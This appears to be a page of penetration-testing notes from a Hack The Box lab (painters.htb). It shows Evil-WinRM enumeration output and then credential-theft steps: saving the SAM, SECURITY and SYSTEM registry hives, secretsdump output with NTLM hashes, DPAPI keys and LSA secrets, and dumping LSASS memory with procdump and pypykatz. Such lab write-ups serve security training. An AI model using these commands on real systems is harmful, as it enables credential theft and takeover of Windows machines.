Enumeration

*Evil-WinRM* PS C:\Users\web_svc> whoami /all

USER INFORMATION
----------------

User Name        SID
================ =============================================
painters\web_svc S-1-5-21-1470357062-2280927533-300823338-1111


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ===============================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators               Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                 Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\web_svc\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2576:c66f:1b78:462a%4
   IPv4 Address. . . . . . . . . . . : 192.168.110.52
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.110.1

Secretsdump.py

reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SAM SAM.SAVE

secretsdump.py -sam SAM.SAVE -security SECURITY.SAVE -system SYSTEM.SAVE LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xb131ea5c8206a94e3d32119d035961a9
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6ee87fa6593a4798fe651f5f5a4e663e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
James:1001:aad3b435b51404eeaad3b435b51404ee:8af1903d3c80d3552a84b6ba296db2ea:::
[*] Dumping cached domain logon information (domain/username:hash)
PAINTERS.HTB/Administrator:$DCC2$10240#Administrator#4f3d8c09f46360e84463d125c240c554: (2024-12-11 15:06:55)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:9c2295062db39652dd63b214344ce839af0ab487e64efc62923556fd6515e24f383f0f9a34006bae1f108446483b2e8c54a2d0bd08388b0e47dc12ad75a1859c45c917072bb683477e379108ff3131bcb52a4d4a2046c6c6f6252945e4b4e3c465a33a379854b4771e7cec30db10df8990bb0867c826c50d8d0646d4f817d70becbf98058e81d6a5b0f606263ea3c6495ff553bef55ee6fe109d03e5237ad0061f9ed7f0694d5c9be2a87379b82491871df259d251ff8a114d76961009551f53a5abaa1d51d7aa1d06d6e730a1a14797d33f71c3690eea3a00a09711f2053872d9dc815e3de06808e6b681c737cc9e33
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:c206d294c947cecc0e60955004ff96c5
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6a28296d276ce0627958e99cfbcab0b54ff64355
dpapi_userkey:0xaf502a3258e233f29ce3ca24257f5877965bb87d
[*] NL$KM 
 0000   48 6D D8 24 3E D2 25 7B  96 58 D1 98 1B 7A E3 57   Hm.$>.%{.X...z.W
 0010   79 5B C9 17 D2 E7 E7 1A  F9 48 B4 9F D8 6D 1E A8   y[.......H...m..
 0020   F8 9B 47 1C B9 E3 B2 E1  CE FC 2C 92 48 01 39 25   ..G.......,.H.9%
 0030   A3 AA D4 45 A3 F4 A5 A8  4B 9B DE 1F 86 A7 5B B7   ...E....K.....[.
NL$KM:486dd8243ed2257b9658d1981b7ae357795bc917d2e7e71af948b49fd86d1ea8f89b471cb9e3b2e1cefc2c9248013925a3aad445a3f4a5a84b9bde1f86a75bb7
[*] Cleaning up...

LSASS

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

pypykatz lsa minidump ./lsass.dmp --outfile lsass_dump

PreviousFoothold NextZEPHYR-PNTBPA

Last updated 9 months ago